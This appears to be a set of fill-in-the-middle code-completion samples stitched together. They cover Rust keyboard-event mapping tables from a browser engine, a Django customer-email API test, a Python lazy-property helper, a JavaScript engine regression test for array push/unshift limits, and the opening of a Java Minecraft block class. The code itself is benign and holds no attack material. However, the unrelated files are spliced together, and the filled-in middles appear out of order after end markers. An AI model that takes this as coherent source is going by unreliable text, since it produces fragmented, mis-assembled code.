pub fn get_key_modifiers(&self) -> KeyModifiers {
let mut result = KeyModifiers::empty();
if self.shift.get() {
result = result | constellation_msg::SHIFT;
}
if self.ctrl.get() {
result = result | constellation_msg::CONTROL;
}
if self.alt.get() {
result = result | constellation_msg::ALT;
}
if self.meta.get() {
result = result | constellation_msg::SUPER;
}
result
}
}
// https://w3c.github.io/uievents-key/#key-value-tables
pub fn key_value(ch: Option<char>, key: Key, mods: KeyModifiers) -> Cow<'static, str> {
if let Some(ch) = ch {
return Cow::from(format!("{}", ch));
}
let shift = mods.contains(constellation_msg::SHIFT);
Cow::from(match key {
Key::Space => " ",
Key::Apostrophe if shift => "\"",
Key::Apostrophe => "'",
Key::Comma if shift => "<",
Key::Comma => ",",
Key::Minus if shift => "_",
Key::Minus => "-",
Key::Period if shift => ">",
Key::Period => ".",
Key::Slash if shift => "?",
Key::Slash => "/",
Key::GraveAccent if shift => "~",
Key::GraveAccent => "`",
Key::Num0 if shift => ")",
Key::Num0 => "0",
Key::Num1 if shift => "!",
Key::Num1 => "1",
Key::Num2 if shift => "@",
Key::Num2 => "2",
Key::Num3 if shift => "#",
Key::Num3 => "3",
Key::Num4 if shift => "$",
Key::Num4 => "4",
Key::Num5 if shift => "%",
Key::Num5 => "5",
Key::Num6 if shift => "^",
Key::Num6 => "6",
Key::Num7 if shift => "&",
Key::Num7 => "7",
Key::Num8 if shift => "*",
Key::Num8 => "8",
Key::Num9 if shift => "(",
Key::Num9 => "9",
Key::Semicolon if shift => ":",
Key::Semicolon => ";",
Key::Equal if shift => "+",
Key::Equal => "=",
Key::A if shift => "A",
Key::A => "a",
Key::B if shift => "B",
Key::B => "b",
Key::C if shift => "C",
Key::C => "c",
Key::D if shift => "D",
Key::D => "d",
Key::E if shift => "E",
Key::E => "e",
Key::F if shift => "F",
Key::F => "f",
Key::G if shift => "G",
Key::G => "g",
Key::H if shift => "H",
Key::H => "h",
Key::I if shift => "I",
Key::I => "i",
Key::J if shift => "J",
Key::J => "j",
Key::K if shift => "K",
Key::K => "k",
Key::L if shift => "L",
Key::L => "l",
Key::M if shift => "M",
Key::M => "m",
Key::N if shift => "N",
Key::N => "n",
Key::O if shift => "O",
Key::O => "o",
Key::P if shift => "P",
Key::P => "p",
Key::Q if shift => "Q",
Key::Q => "q",
Key::R if shift => "R",
Key::R => "r",
Key::S if shift => "S",
Key::S => "s",
Key::T if shift => "T",
Key::T => "t",
Key::U if shift => "U",
Key::U => "u",
Key::V if shift => "V",
Key::V => "v",
Key::W if shift => "W",
Key::W => "w",
Key::X if shift => "X",
Key::X => "x",
Key::Y if shift => "Y",
Key::Y => "y",
Key::Z if shift => "Z",
Key::Z => "z",
Key::LeftBracket if shift => "{",
Key::LeftBracket => "[",
Key::Backslash if shift => "|",
Key::Backslash => "\\",
Key::RightBracket if shift => "}",
Key::RightBracket => "]",
Key::World1 => "Unidentified",
Key::World2 => "Unidentified",
Key::Escape => "Escape",
Key::Enter => "Enter",
Key::Tab => "Tab",
Key::Backspace => "Backspace",
Key::Insert => "Insert",
Key::Delete => "Delete",
Key::Right => "ArrowRight",
Key::Left => "ArrowLeft",
Key::Down => "ArrowDown",
Key::Up => "ArrowUp",
Key::PageUp => "PageUp",
Key::PageDown => "PageDown",
Key::Home => "Home",
Key::End => "End",
Key::CapsLock => "CapsLock",
Key::ScrollLock => "ScrollLock",
Key::NumLock => "NumLock",
Key::PrintScreen => "PrintScreen",
Key::Pause => "Pause",
Key::F1 => "F1",
Key::F2 => "F2",
Key::F3 => "F3",
Key::F4 => "F4",
Key::F5 => "F5",
Key::F6 => "F6",
Key::F7 => "F7",
Key::F8 => "F8",
Key::F9 => "F9",
Key::F10 => "F10",
Key::F11 => "F11",
Key::F12 => "F12",
Key::F13 => "F13",
Key::F14 => "F14",
Key::F15 => "F15",
Key::F16 => "F16",
Key::F17 => "F17",
Key::F18 => "F18",
Key::F19 => "F19",
Key::F20 => "F20",
Key::F21 => "F21",
Key::F22 => "F22",
Key::F23 => "F23",
Key::F24 => "F24",
Key::F25 => "F25",
Key::Kp0 => "0",
Key::Kp1 => "1",
Key::Kp2 => "2",
Key::Kp3 => "3",
Key::Kp4 => "4",
Key::Kp5 => "5",
Key::Kp6 => "6",
Key::Kp7 => "7",
Key::Kp8 => "8",
Key::Kp9 => "9",
Key::KpDecimal => ".",
Key::KpDivide => "/",
Key::KpMultiply => "*",
Key::KpSubtract => "-",
Key::KpAdd => "+",
Key::KpEnter => "Enter",
Key::KpEqual => "=",
Key::LeftShift => "Shift",
Key::LeftControl => "Control",
Key::LeftAlt => "Alt",
Key::LeftSuper => "Super",
Key::RightShift => "Shift",
Key::RightControl => "Control",
Key::RightAlt => "Alt",
Key::RightSuper => "Super",
Key::Menu => "ContextMenu",
Key::NavigateForward => "BrowserForward",
Key::NavigateBackward => "BrowserBack",
})
}
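// Maps a DOM `key` string back to a `Key`. The DOM key location is needed to
// disambiguate characters that exist both on the main key block and on the
// numpad (digits, '+', '-', '*', '/', '.', '=', and "Enter").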
fn key_from_string(key_string: &str, location: u32) -> Option<Key> {
match key_string {
" " => Some(Key::Space),
"\"" => Some(Key::Apostrophe),
"'" => Some(Key::Apostrophe),
"<" => Some(Key::Comma),
"," => Some(Key::Comma),
"_" => Some(Key::Minus),
"-" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Minus),
">" => Some(Key::Period),
"." if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Period),
"?" => Some(Key::Slash),
"/" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Slash),
"~" => Some(Key::GraveAccent),
"`" => Some(Key::GraveAccent),
")" => Some(Key::Num0),
"0" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num0),
"!" => Some(Key::Num1),
"1" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num1),
"@" => Some(Key::Num2),
"2" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num2),
"#" => Some(Key::Num3),
"3" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num3),
"$" => Some(Key::Num4),
"4" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num4),
"%" => Some(Key::Num5),
"5" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num5),
"^" => Some(Key::Num6),
"6" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num6),
"&" => Some(Key::Num7),
"7" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num7),
"*" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num8),
"8" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num8),
"(" => Some(Key::Num9),
"9" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num9),
":" => Some(Key::Semicolon),
";" => Some(Key::Semicolon),
"+" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Equal),
"=" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Equal),
"A" => Some(Key::A),
"a" => Some(Key::A),
"B" => Some(Key::B),
"b" => Some(Key::B),
"C" => Some(Key::C),
"c" => Some(Key::C),
"D" => Some(Key::D),
"d" => Some(Key::D),
"E" => Some(Key::E),
"e" => Some(Key::E),
"F" => Some(Key::F),
"f" => Some(Key::F),
"G" => Some(Key::G),
"g" => Some(Key::G),
"H" => Some(Key::H),
"h" => Some(Key::H),
"I" => Some(Key::I),
"i" => Some(Key::I),
"J" => Some(Key::J),
"j" => Some(Key::J),
"K" => Some(Key::K),
"k" => Some(Key::K),
"L" => Some(Key::L),
"l" => Some(Key::L),
"M" => Some(Key::M),
"m" => Some(Key::M),
"N" => Some(Key::N),
"n" => Some(Key::N),
"O" => Some(Key::O),
"o" => Some(Key::O),
"P" => Some(Key::P),
"p" => Some(Key::P),
"Q" => Some(Key::Q),
"q" => Some(Key::Q),
"R" => Some(Key::R),
"r" => Some(Key::R),
"S" => Some(Key::S),
"s" => Some(Key::S),
"T" => Some(Key::T),
"t" => Some(Key::T),
"U" => Some(Key::U),
"u" => Some(Key::U),
"V" => Some(Key::V),
"v" => Some(Key::V),
"W" => Some(Key::W),
"w" => Some(Key::W),
"X" => Some(Key::X),
"x" => Some(Key::X),
"Y" => Some(Key::Y),
"y" => Some(Key::Y),
"Z" => Some(Key::Z),
"z" => Some(Key::Z),
"{" => Some(Key::LeftBracket),
"[" => Some(Key::LeftBracket),
"|" => Some(Key::Backslash),
"\\" => Some(Key::Backslash),
"}" => Some(Key::RightBracket),
"]" => Some(Key::RightBracket),
"Escape" => Some(Key::Escape),
"Enter" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Enter),
"Tab" => Some(Key::Tab),
"Backspace" => Some(Key::Backspace),
"Insert" => Some(Key::Insert),
"Delete" => Some(Key::Delete),
"ArrowRight" => Some(Key::Right),
"ArrowLeft" => Some(Key::Left),
"ArrowDown" => Some(Key::Down),
"ArrowUp" => Some(Key::Up),
"PageUp" => Some(Key::PageUp),
"PageDown" => Some(Key::PageDown),
"Home" => Some(Key::Home),
"End" => Some(Key::End),
"CapsLock" => Some(Key::CapsLock),
"ScrollLock" => Some(Key::ScrollLock),
"NumLock" => Some(Key::NumLock),
"PrintScreen" => Some(Key::PrintScreen),
"Pause" => Some(Key::Pause),
"F1" => Some(Key::F1),
"F2" => Some(Key::F2),
"F3" => Some(Key::F3),
"F4" => Some(Key::F4),
"F5" => Some(Key::F5),
"F6" => Some(Key::F6),
"F7" => Some(Key::F7),
"F8" => Some(Key::F8),
"F9" => Some(Key::F9),
"F10" => Some(Key::F10),
"F11" => Some(Key::F11),
"F12" => Some(Key::F12),
"F13" => Some(Key::F13),
"F14" => Some(Key::F14),
"F15" => Some(Key::F15),
"F16" => Some(Key::F16),
"F17" => Some(Key::F17),
"F18" => Some(Key::F18),
"F19" => Some(Key::F19),
"F20" => Some(Key::F20),
"F21" => Some(Key::F21),
"F22" => Some(Key::F22),
"F23" => Some(Key::F23),
"F24" => Some(Key::F24),
"F25" => Some(Key::F25),
"0" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp0),
"1" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp1),
"2" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp2),
"3" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp3),
"4" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp4),
"5" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp5),
"6" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp6),
"7" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp7),
"8" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp8),
"9" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp9),
"." if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpDecimal),
"/" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpDivide),
"*" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpMultiply),
"-" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpSubtract),
"+" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpAdd),
"Enter" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpEnter),
"=" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpEqual),
"Shift" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftShift),
"Control" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftControl),
"Alt" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftAlt),
"Super" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftSuper),
"Shift" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightShift),
"Control" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightControl),
"Alt" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightAlt),
"Super" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightSuper),
"ContextMenu" => Some(Key::Menu),
"BrowserForward" => Some(Key::NavigateForward),
"BrowserBack" => Some(Key::NavigateBackward),
_ => None
}
}
// https://w3c.github.io/uievents-code/#code-value-tables
fn code_value(key: Key) -> &'static str {
match key {
Key::Space => "Space",
Key::Apostrophe => "Quote",
Key::Comma => "Comma",
Key::Minus => "Minus",
Key::Period => "Period",
Key::Slash => "Slash",
Key::GraveAccent => "Backquote",
Key::Num0 => "Digit0",
Key::Num1 => "Digit1",
Key::Num2 => "Digit2",
Key::Num3 => "Digit3",
Key::Num4 => "Digit4",
Key::Num5 => "Digit5",
Key::Num6 => "Digit6",
Key::Num7 => "Digit7",
Key::Num8 => "Digit8",
Key::Num9 => "Digit9",
Key::Semicolon => "Semicolon",
Key::Equal => "Equal",
Key::A => "KeyA",
Key::B => "KeyB",
Key::C => "KeyC",
Key::D => "KeyD",
Key::E => "KeyE",
Key::F => "KeyF",
Key::G => "KeyG",
Key::H => "KeyH",
Key::I => "KeyI",
Key::J => "KeyJ",
Key::K => "KeyK",
Key::L => "KeyL",
Key::M => "KeyM",
Key::N => "KeyN",
Key::O => "KeyO",
Key::P => "KeyP",
Key::Q => "KeyQ",
Key::R => "KeyR",
Key::S => "KeyS",
Key::T => "KeyT",
Key::U => "KeyU",
Key::V => "KeyV",
Key::W => "KeyW",
Key::X => "KeyX",
Key::Y => "KeyY",
Key::Z => "KeyZ",
Key::LeftBracket => "BracketLeft",
Key::Backslash => "Backslash",
Key::RightBracket => "BracketRight",
Key::World1 |
Key::World2 => panic!("unknown char code for {:?}", key),
Key::Escape => "Escape",
Key::Enter => "Enter",
Key::Tab => "Tab",
Key::Backspace => "Backspace",
Key::Insert => "Insert",
Key::Delete => "Delete",
Key::Right => "ArrowRight",
Key::Left => "ArrowLeft",
Key::Down => "ArrowDown",
Key::Up => "ArrowUp",
Key::PageUp => "PageUp",
Key::PageDown => "PageDown",
Key::Home => "Home",
Key::End => "End",
Key::CapsLock => "CapsLock",
Key::ScrollLock => "ScrollLock",
Key::NumLock => "NumLock",
Key::PrintScreen => "PrintScreen",
Key::Pause => "Pause",
Key::F1 => "F1",
Key::F2 => "F2",
Key::F3 => "F3",
Key::F4 => "F4",
Key::F5 => "F5",
Key::F6 => "F6",
Key::F7 => "F7",
Key::F8 => "F8",
Key::F9 => "F9",
Key::F10 => "F10",
Key::F11 => "F11",
Key::F12 => "F12",
Key::F13 => "F13",
Key::F14 => "F14",
Key::F15 => "F15",
Key::F16 => "F16",
Key::F17 => "F17",
Key::F18 => "F18",
Key::F19 => "F19",
Key::F20 => "F20",
Key::F21 => "F21",
Key::F22 => "F22",
Key::F23 => "F23",
Key::F24 => "F24",
Key::F25 => "F25",
Key::Kp0 => "Numpad0",
Key::Kp1 => "Numpad1",
Key::Kp2 => "Numpad2",
Key::Kp3 => "Numpad3",
Key::Kp4 => "Numpad4",
Key::Kp5 => "Numpad5",
Key::Kp6 => "Numpad6",
Key::Kp7 => "Numpad7",
Key::Kp8 => "Numpad8",
Key::Kp9 => "Numpad9",
Key::KpDecimal => "NumpadDecimal",
Key::KpDivide => "NumpadDivide",
Key::KpMultiply => "NumpadMultiply",
Key::KpSubtract => "NumpadSubtract",
Key::KpAdd => "NumpadAdd",
Key::KpEnter => "NumpadEnter",
Key::KpEqual => "NumpadEqual",
Key::LeftShift | Key::RightShift => "Shift",
Key::LeftControl | Key::RightControl => "Control",
Key::LeftAlt | Key::RightAlt => "Alt",
Key::LeftSuper | Key::RightSuper => "Super",
Key::Menu => "ContextMenu",
Key::NavigateForward => "BrowserForward",
Key::NavigateBackward => "BrowserBackward",
}
}
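    // Maps a key to the DOM_KEY_LOCATION_* constant exposed as KeyboardEvent.location.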
fn key_location(key: Key) -> u32 {
match key {
Key::Kp0 | Key::Kp1 | Key::Kp2 |
Key::Kp3 | Key::Kp4 | Key::Kp5 |
Key::Kp6 | Key::Kp7 | Key::Kp8 |
Key::Kp9 | Key::KpDecimal |
Key::KpDivide | Key::KpMultiply |
Key::KpSubtract | Key::KpAdd |
Key::KpEnter | Key::KpEqual =>
KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD,
Key::LeftShift | Key::LeftAlt |
Key::LeftControl | Key::LeftSuper =>
KeyboardEventConstants::DOM_KEY_LOCATION_LEFT,
Key::RightShift | Key::RightAlt |
Key::RightControl | Key::RightSuper =>
KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT,
_ => KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD,
}
}
// https://w3c.github.io/uievents/#legacy-key-models
fn key_keycode(key: Key) -> u32 {
match key {
// https://w3c.github.io/uievents/#legacy-key-models
Key::Backspace => 8,
Key::Tab => 9,
Key::Enter => 13,
Key::LeftShift | Key::RightShift => 16,<|fim▁hole|> Key::Space => 32,
Key::PageUp => 33,
Key::PageDown => 34,
Key::End => 35,
Key::Home => 36,
Key::Left => 37,
Key::Up => 38,
Key::Right => 39,
Key::Down => 40,
Key::Delete => 46,
// https://w3c.github.io/uievents/#optionally-fixed-virtual-key-codes
Key::Semicolon => 186,
Key::Equal => 187,
Key::Comma => 188,
Key::Minus => 189,
Key::Period => 190,
Key::Slash => 191,
Key::LeftBracket => 219,
Key::Backslash => 220,
Key::RightBracket => 221,
Key::Apostrophe => 222,
//§ B.2.1.3
Key::Num0 |
Key::Num1 |
Key::Num2 |
Key::Num3 |
Key::Num4 |
Key::Num5 |
Key::Num6 |
Key::Num7 |
Key::Num8 |
Key::Num9 => key as u32 - Key::Num0 as u32 + '0' as u32,
//§ B.2.1.4
Key::A |
Key::B |
Key::C |
Key::D |
Key::E |
Key::F |
Key::G |
Key::H |
Key::I |
Key::J |
Key::K |
Key::L |
Key::M |
Key::N |
Key::O |
Key::P |
Key::Q |
Key::R |
Key::S |
Key::T |
Key::U |
Key::V |
Key::W |
Key::X |
Key::Y |
Key::Z => key as u32 - Key::A as u32 + 'A' as u32,
//§ B.2.1.8
_ => 0
}
}
#[derive(HeapSizeOf)]
pub struct KeyEventProperties {
pub key_string: Cow<'static, str>,
pub code: &'static str,
pub location: u32,
pub char_code: Option<u32>,
pub key_code: u32,
}
impl KeyEventProperties {
pub fn is_printable(&self) -> bool {
self.char_code.is_some()
}
}
impl KeyboardEventMethods for KeyboardEvent {
// https://w3c.github.io/uievents/#widl-KeyboardEvent-initKeyboardEvent
fn InitKeyboardEvent(&self,
type_arg: DOMString,
can_bubble_arg: bool,
cancelable_arg: bool,
view_arg: Option<&Window>,
key_arg: DOMString,
location_arg: u32,
_modifiers_list_arg: DOMString,
repeat: bool,
_locale: DOMString) {
if self.upcast::<Event>().dispatching() {
return;
}
self.upcast::<UIEvent>()
.InitUIEvent(type_arg, can_bubble_arg, cancelable_arg, view_arg, 0);
*self.key_string.borrow_mut() = key_arg;
self.location.set(location_arg);
self.repeat.set(repeat);
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-key
fn Key(&self) -> DOMString {
self.key_string.borrow().clone()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-code
fn Code(&self) -> DOMString {
self.code.borrow().clone()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-location
fn Location(&self) -> u32 {
self.location.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-ctrlKey
fn CtrlKey(&self) -> bool {
self.ctrl.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-shiftKey
fn ShiftKey(&self) -> bool {
self.shift.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-altKey
fn AltKey(&self) -> bool {
self.alt.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-metaKey
fn MetaKey(&self) -> bool {
self.meta.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-repeat
fn Repeat(&self) -> bool {
self.repeat.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-isComposing
fn IsComposing(&self) -> bool {
self.is_composing.get()
}
// https://w3c.github.io/uievents/#dom-keyboardevent-getmodifierstate
fn GetModifierState(&self, key_arg: DOMString) -> bool {
match &*key_arg {
"Ctrl" => self.CtrlKey(),
"Alt" => self.AltKey(),
"Shift" => self.ShiftKey(),
"Meta" => self.MetaKey(),
"AltGraph" | "CapsLock" | "NumLock" | "ScrollLock" | "Accel" |
"Fn" | "FnLock" | "Hyper" | "OS" | "Symbol" | "SymbolLock" => false, //FIXME
_ => false,
}
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-charCode
fn CharCode(&self) -> u32 {
self.char_code.get().unwrap_or(0)
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-keyCode
fn KeyCode(&self) -> u32 {
self.key_code.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-which
fn Which(&self) -> u32 {
self.char_code.get().unwrap_or(self.KeyCode())
}
// https://dom.spec.whatwg.org/#dom-event-istrusted
fn IsTrusted(&self) -> bool {
self.uievent.IsTrusted()
}
}<|fim▁end|>
|
Key::LeftControl | Key::RightControl => 17,
Key::LeftAlt | Key::RightAlt => 18,
Key::CapsLock => 20,
Key::Escape => 27,
|
<|file_name|>tests.py<|end_file_name|><|fim▁begin|>import django
django.setup()
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from customers.models import Customer, Email
class CustomersTest(APITestCase, TestCase):
def test_api_should_accept_multiple_emails_for_new_customers(self):
customer = self.get_default_customer()
customer['emails'].append({
"address": "[email protected]",
"description": "Professional"
})
customer['emails'].append({
"address": "[email protected]",
"description": "Personal"
})
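        # posting the customer with nested emails should create one Customer plus its two Email rows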
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Customer.objects.count(), 1)
self.assertEqual(Email.objects.count(), 2)
def test_api_should_not_accept_empty_email(self):<|fim▁hole|>
def test_api_should_not_accept_equal_emails(self):
customer = self.get_default_customer()
customer['emails'].append({
"address": "[email protected]",
"description": "Professional"
})
customer['emails'].append({
"address": "[email protected]",
"description": "Personal"
})
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def get_default_customer(self):
return {
"name": "Jhon Doe",
"date_of_birth": "1990-3-3",
"gender": "M",
"emails": []
};<|fim▁end|>
|
customer = self.get_default_customer()
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>'''
salt.utils
~~~~~~~~~~
'''
<|fim▁hole|> meant to be used for lazy evaluation of an object attribute.
property should represent non-mutable data, as it replaces itself.
http://stackoverflow.com/a/6849299/564003
'''
def __init__(self, fget):
self.fget = fget
self.func_name = fget.__name__
def __get__(self, obj, cls):
if obj is None:
return None
value = self.fget(obj)
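        # cache the computed value on the instance so this descriptor is bypassed on later lookups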
setattr(obj, self.func_name, value)
return value<|fim▁end|>
|
class lazy_property(object):
'''
|
<|file_name|>regress-465980-02.js<|end_file_name|><|fim▁begin|>/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is JavaScript Engine testing utilities.
*
* The Initial Developer of the Original Code is
* Mozilla Foundation.
* Portions created by the Initial Developer are Copyright (C) 2008
* the Initial Developer. All Rights Reserved.
*
* Contributor(s): Jeff Walden
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
//-----------------------------------------------------------------------------
var BUGNUMBER = 465980;
var summary = 'Do not crash @ InitArrayElements';
var actual = '';
var expect = '';
//-----------------------------------------------------------------------------
test();
//-----------------------------------------------------------------------------
function test()
{
enterFunc ('test');
printBugNumber(BUGNUMBER);
printStatus (summary);
function describe(name, startLength, pushArgs, expectThrow, expectLength)
{
return name + "(" + startLength + ", " +
"[" + pushArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")";
}
var push = Array.prototype.push;
var unshift = Array.prototype.unshift;
function testArrayPush(startLength, pushArgs, expectThrow, expectLength)
{
print("running testArrayPush(" +
startLength + ", " +
"[" + pushArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")...");
var a = new Array(startLength);
try
{
push.apply(a, pushArgs);
if (expectThrow)
{
throw "expected to throw for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
}
catch (e)
{
if (!(e instanceof RangeError))
{
throw "unexpected exception type thrown: " + e + " for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,<|fim▁hole|> throw "unexpected exception " + e + " for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
}
if (a.length !== expectLength)
{
throw "unexpected modified-array length for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
for (var i = 0, sz = pushArgs.length; i < sz; i++)
{
var index = i + startLength;
if (a[index] !== pushArgs[i])
{
throw "unexpected value " + a[index] +
" at index " + index + " (" + i + ") during " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength) + ", expected " + pushArgs[i];
}
}
}
function testArrayUnshift(startLength, unshiftArgs, expectThrow, expectLength)
{
print("running testArrayUnshift(" +
startLength + ", " +
"[" + unshiftArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")...");
var a = new Array(startLength);
try
{
unshift.apply(a, unshiftArgs);
if (expectThrow)
{
throw "expected to throw for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
catch (e)
{
if (!(e instanceof RangeError))
{
throw "unexpected exception type thrown: " + e + " for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
if (!expectThrow)
{
throw "unexpected exception " + e + " for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
if (a.length !== expectLength)
{
throw "unexpected modified-array length for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
for (var i = 0, sz = unshiftArgs.length; i < sz; i++)
{
if (a[i] !== unshiftArgs[i])
{
throw "unexpected value at index " + i + " during " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
}
var failed = true;
try
{
var foo = "foo", bar = "bar", baz = "baz";
testArrayPush(4294967294, [foo], false, 4294967295);
testArrayPush(4294967294, [foo, bar], true, 4294967295);
testArrayPush(4294967294, [foo, bar, baz], true, 4294967295);
testArrayPush(4294967295, [foo], true, 4294967295);
testArrayPush(4294967295, [foo, bar], true, 4294967295);
testArrayPush(4294967295, [foo, bar, baz], true, 4294967295);
testArrayUnshift(4294967294, [foo], false, 4294967295);
testArrayUnshift(4294967294, [foo, bar], true, 4294967294);
testArrayUnshift(4294967294, [foo, bar, baz], true, 4294967294);
testArrayUnshift(4294967295, [foo], true, 4294967295);
testArrayUnshift(4294967295, [foo, bar], true, 4294967295);
testArrayUnshift(4294967295, [foo, bar, baz], true, 4294967295);
}
catch (e)
{
actual = e + '';
}
reportCompare(expect, actual, summary);
exitFunc ('test');
}<|fim▁end|>
|
expectLength);
}
if (!expectThrow)
{
|
<|file_name|>BlockCombustionEngine.java<|end_file_name|><|fim▁begin|>package com.plutomc.power.common.blocks;
import com.plutomc.core.common.blocks.BlockMetal;
import com.plutomc.power.Power;
import com.plutomc.power.common.tileentities.TileEntityCombustionEngine;
import com.plutomc.power.init.BlockRegistry;
import com.plutomc.power.init.GuiHandler;
import net.minecraft.block.ITileEntityProvider;
import net.minecraft.block.properties.PropertyDirection;
import net.minecraft.block.state.BlockStateContainer;
import net.minecraft.block.state.IBlockState;
import net.minecraft.entity.EntityLivingBase;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.inventory.InventoryHelper;
import net.minecraft.item.ItemStack;
import net.minecraft.tileentity.TileEntity;
import net.minecraft.util.EnumFacing;
import net.minecraft.util.EnumHand;
import net.minecraft.util.math.BlockPos;
import net.minecraft.world.World;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
* plutomc_power
* Copyright (C) 2016 Kevin Boxhoorn
*
